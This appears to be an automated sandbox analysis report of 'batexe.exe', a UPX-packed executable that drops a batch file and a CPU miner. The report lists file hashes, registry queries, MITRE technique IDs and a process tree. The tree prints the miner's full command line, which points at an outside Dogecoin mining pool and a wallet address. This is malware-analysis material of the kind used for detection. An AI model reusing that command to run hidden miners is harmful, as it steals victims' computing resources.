73cc2881ef511788661955a624db9baf40ac16bc63266c5c3bb3fe62b4856d72

Analysis

max time kernel
294s
max time network
301s
platform
windows10-2004_x64
resource
win10v2004-20231215-ja
resource tags

arch:x64arch:x86image:win10v2004-20231215-jalocale:ja-jpos:windows10-2004-x64systemwindows
submitted
12-02-2024 03:28

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

batexe.exe
Size

9.4MB
MD5

cdc9eacffc6d2bf43153815043064427
SHA1

d05101f265f6ea87e18793ab0071f5c99edf363f
SHA256

73cc2881ef511788661955a624db9baf40ac16bc63266c5c3bb3fe62b4856d72
SHA512

fc6945957e160bf7059c936c329aae438e6c1521e5e43a8434f58058230d89e818eb6ff80331a4b952dbb600b8cc134ecba54e5641bf549723c98f85e993fde6
SSDEEP

196608:ERAefrn9wcsTRAJgwusnWpV3h9XxSeEGaT+TKkGzySdUkI56kBIyky:E5Tn9YVwdnWLXxkvLlzkuv

Score

7^/10

upx

Malware Config

Signatures

Checks computer location settings 2 TTPs 2 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\USER\S-1-5-21-3791175113-1062217823-1177695025-1000\Control Panel\International\Geo\Nation	batexe.exe
Key value queried	\REGISTRY\USER\S-1-5-21-3791175113-1062217823-1177695025-1000\Control Panel\International\Geo\Nation	b2e.exe

Executes dropped EXE 2 IoCs

pid	Process
1064	b2e.exe
536	cpuminer-sse2.exe

Loads dropped DLL 5 IoCs

pid	Process
536	cpuminer-sse2.exe
536	cpuminer-sse2.exe
536	cpuminer-sse2.exe
536	cpuminer-sse2.exe
536	cpuminer-sse2.exe

UPX packed file 1 IoCs

Detects executables packed with UPX/modified UPX open source packer.

upx

resource	yara_rule
behavioral2/memory/1408-9-0x0000000000400000-0x000000000393A000-memory.dmp	upx

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Suspicious use of WriteProcessMemory 8 IoCs

description	pid	Process	procid_target
PID 1408 wrote to memory of 1064	1408	batexe.exe	84
PID 1408 wrote to memory of 1064	1408	batexe.exe	84
PID 1408 wrote to memory of 1064	1408	batexe.exe	84
PID 1064 wrote to memory of 1700	1064	b2e.exe	85
PID 1064 wrote to memory of 1700	1064	b2e.exe	85
PID 1064 wrote to memory of 1700	1064	b2e.exe	85
PID 1700 wrote to memory of 536	1700	cmd.exe	88
PID 1700 wrote to memory of 536	1700	cmd.exe	88

C:\Users\Admin\AppData\Local\Temp\batexe.exe
"C:\Users\Admin\AppData\Local\Temp\batexe.exe"
1⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:1408
- C:\Users\Admin\AppData\Local\Temp\638C.tmp\b2e.exe
  "C:\Users\Admin\AppData\Local\Temp\638C.tmp\b2e.exe" C:\Users\Admin\AppData\Local\Temp\638C.tmp\b2e.exe C:\Users\Admin\AppData\Local\Temp "C:\Users\Admin\AppData\Local\Temp\batexe.exe"
  2⤵
  - Checks computer location settings
  - Executes dropped EXE
  - Suspicious use of WriteProcessMemory
  PID:1064
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\66F7.tmp\batchfile.bat" "
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:1700
  - - C:\Users\Admin\AppData\Local\Temp\cpuminer-sse2.exe
      cpuminer-sse2.exe -a yespower -o stratum+tcp://yespower.sea.mine.zpool.ca:6234 --userpass=DJXKcu8iouhRppneQL9XbYQ9ovs87y4cYZ:c=doge -t 3
      4⤵
      Executes dropped EXE
      Loads dropped DLL
      PID:536

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

Query Registry

T1012

System Information Discovery

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Temp\638C.tmp\b2e.exe

Filesize
5.1MB

MD5
2a717cabcbb60f293002bf30828d27b9

SHA1
3329f5a03f6a6b9185a20e6e48f6d0304518c2be

SHA256
0b64f36a955a38b1a256094758035c21cccbe3de50f05ceb1efb767bca5f7b56

SHA512
63163026e7f7c60578710ea56fb4ed1f23f231ea15654eb7ac6b094bc3f8e7fc99eec41c636e2137603ca651abea6b08b3fc6dfef30aceaca5151d866899b06c

Download Submit
C:\Users\Admin\AppData\Local\Temp\638C.tmp\b2e.exe

Filesize
1.7MB

MD5
7b9e19cbeef48d1436f80636d98f1e29

SHA1
211ab3ec2dbf56621bfa6e7b4af51f6d59ed7e22

SHA256
ab3065d4cd6d2916257227617fba70a92bdb7b65f474d9a3b5a7910c6791775d

SHA512
cd561dbc1747d3f5e1a799a1d6f13d71150e273835ecfd1f84b00e742b04a23b41daf83db404ef527c1531f665bd6e74a4fc62bc84759208b958a4803063bdae

Download Submit
C:\Users\Admin\AppData\Local\Temp\638C.tmp\b2e.exe

Filesize
1.1MB

MD5
98a6e77a713f1bdd53585d4fcd834607

SHA1
1e44264b46afe8fbb11e8dc41d226fc9eb951d45

SHA256
036cf4569945691322d211cd1b69d1973d56fd959e345ebcd144f25e17c350b1

SHA512
4429eb4ff224636650c15c07a22d2ca3bf8c9a6f3298f1b89f0fd56f8d0cbfd3de875ebcc728b302d18b532957d1830723c38488f0ab541fb4f3628df0f892d6

Download Submit
C:\Users\Admin\AppData\Local\Temp\66F7.tmp\batchfile.bat

Filesize
136B

MD5
8ea7ac72a10251ecfb42ef4a88bd330a

SHA1
c30f6af73a42c0cc89bd20fe95f9159d6f0756c5

SHA256
65e2674fc9b921a76deaf3740603359794c04e059e8937ab36eb931d65f40ec9

SHA512
a908979d588625aa24eb81238d07d88a56be5388e1265ebd2fe09889ed807aa9a4af77107e72a843c31acadbe06db0d7f6f6a3c95fb481a71e549e8eb74c2ff0

Download Submit
C:\Users\Admin\AppData\Local\Temp\cpuminer-sse2.exe

Filesize
1.9MB

MD5
e75de0a4da8dad396f91417fdc6445b8

SHA1
6e4d0bb6e2d0107869ef086cbb57d812f87d5c2a

SHA256
def062dc0ba00e1438a224a8d12c953dd697281f49b0e9b22b3db31c44b25eef

SHA512
ab22155e200ee13a8a882586fe31dadc6af4883316406a677900fd25c69fb97385932788f825821e2c3d8ee53249df6c62013925f8e4e0c4daa9d7d45091a085

Download Submit
C:\Users\Admin\AppData\Local\Temp\cpuminer-sse2.exe

Filesize
1.2MB

MD5
93a5c1add02270e32d6940f1551e3caa

SHA1
addd05194369b0a18ebba3b78349f1cd36e16423

SHA256
9885d1e0e5633fcdcda3ad619f326bd9b2faba2b30ac44f17be8b8bd80a2b867

SHA512
0a3f66c70b13ae329a08e18a8720989b9a1ffd3c8d3a280fe9cd86f894e7b13f662049cb5ecf6db44f8cf7b99618edd23f6975774697c373fee6c24183d0906f

Download Submit
C:\Users\Admin\AppData\Local\Temp\libcurl-4.dll

Filesize
836KB

MD5
aeab40ed9a8e627ea7cefc1f5cf9bf7a

SHA1
5e2e8ca2881b9bf9edfa3c4fdcec6da1efa102d8

SHA256
218cfc4073bab4eddf0de0804f96b204687311e20a9e97994bff54c9b0e01ee9

SHA512
c0a67616fa01fdc351015212a718faf70da6612fbb3ec13da28dd7af9a507c56882fb7c3eea6fbc37d4d63b970157199d16d0756dbe3cb3bc2223e215cb104d8

Download Submit
C:\Users\Admin\AppData\Local\Temp\libgcc_s_seh-1.dll

Filesize
1.1MB

MD5
a5f50e97e20786f693bc471db3cd1686

SHA1
525ab151a96d755dbf76c52cfad1a9283394ed60

SHA256
0fa9c5e3aaeaff740313f8721ecf1a51eb0c3fea3050365877da1be661c557a8

SHA512
4b5abeae4a3700f4a77c6d91de61aead5bf8f863f3568822931646ec182388ca091036c2c80a3800c289406274ca32b6fe9437301b36952d32d5a8fa7701ff03

Download Submit
C:\Users\Admin\AppData\Local\Temp\libgcc_s_seh-1.dll

Filesize
1.2MB

MD5
7cf672bee2afba2dcd0c031ff985958e

SHA1
6b82a205db080ffdcb4a4470fce85a14413f3217

SHA256
c82f84171b9246d1cac261100b2199789c96c37b03b375f33b2c72afab060b05

SHA512
3e90d1c1efe0200cb3cc7b51d04783a3cce8391faa6ce554cff8b23dac60be9f8e4f980a8ac005fd9dff8ea4bdcb02311f7649c5be28eb32dcc26417fc4090e5

Download Submit
C:\Users\Admin\AppData\Local\Temp\libstdc++-6.dll

Filesize
1.4MB

MD5
d942be7719296429a9e0696e8bde3bd3

SHA1
93def08f6ba68a9da7325650b7b08989bb5b70c1

SHA256
16d38ace11b1a8eb3dbaf6b2369fc40e7967ee1421eb7c629521782f801ee9c7

SHA512
b10fafb62b9041880711c7f17ef9fb871c265d41d9472ac73675574419f60f35dae023c9150ccda21cc6a3e0b122aca45f0cca161ae6f58ba498e158a8de6644

Download Submit
C:\Users\Admin\AppData\Local\Temp\libstdc++-6.dll

Filesize
1.2MB

MD5
338d830b956600a4702dbac018b64815

SHA1
ca364df550ea4a202427cce1976317155b6f3183

SHA256
334753eca036e7981285d7d53496e5b04b7b7f2e2e25c53f4eafc302cdd67a46

SHA512
0ffa08b81aeced9bfcd6d92e8af30f6240788032d107b8627fec205418124d66f161dcc44d650bc9c5289db5d64ae62e3f7ad46ebe3545aa82414a6f7a86589f

Download Submit
C:\Users\Admin\AppData\Local\Temp\libstdc++-6.dll

Filesize
1.1MB

MD5
68c5e0381e1c5d6b70ef9d79dc481619

SHA1
5b4b27ce7d562f9e8693b85738e0c5b2abb35573

SHA256
072b801f8ad08956f656ef2ffeb939a9a2e3754010303235b4baf0b47f740040

SHA512
27b19fd19dcd7149540f91edecf8cfcbf7adb2400922f849c608f047f277171d9028dc765fefef858c3ee7cf90075bee0cb1f4c97789e3f1f071ef40947956f5

Download Submit
C:\Users\Admin\AppData\Local\Temp\libwinpthread-1.dll

Filesize
606KB

MD5
585efec1bc1d4d916a4402c9875dff75

SHA1
d209613666ccac9d0ddab29a3bc59aa00a0968fa

SHA256
2f9984c591a5654434c53e8b4d0c5c187f1fd0bab95247d5c9bc1c0bd60e6232

SHA512
b93163cba4601ed999a7a7d1887113792e846c36850c6d84f2d505727dc06524bb959469f9df12928769f4535dc6074a6b3599b788a4844353e466742ce1e770

Download Submit
memory/536-74-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/536-43-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/536-64-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/536-69-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/536-45-0x0000000061440000-0x000000006156B000-memory.dmp

Filesize
1.2MB

Download
memory/536-44-0x0000000070800000-0x00000000708BC000-memory.dmp

Filesize
752KB

Download
memory/536-47-0x00000000010A0000-0x0000000002955000-memory.dmp

Filesize
24.7MB

Download
memory/536-59-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/536-104-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/536-99-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/536-46-0x00000000598A0000-0x0000000059938000-memory.dmp

Filesize
608KB

Download
memory/536-94-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/536-79-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/536-84-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/536-89-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/1064-8-0x0000000000400000-0x0000000000405000-memory.dmp

Filesize
20KB

Download
memory/1064-53-0x0000000000400000-0x0000000000405000-memory.dmp

Filesize
20KB

Download
memory/1408-9-0x0000000000400000-0x000000000393A000-memory.dmp

Filesize
53.2MB

Download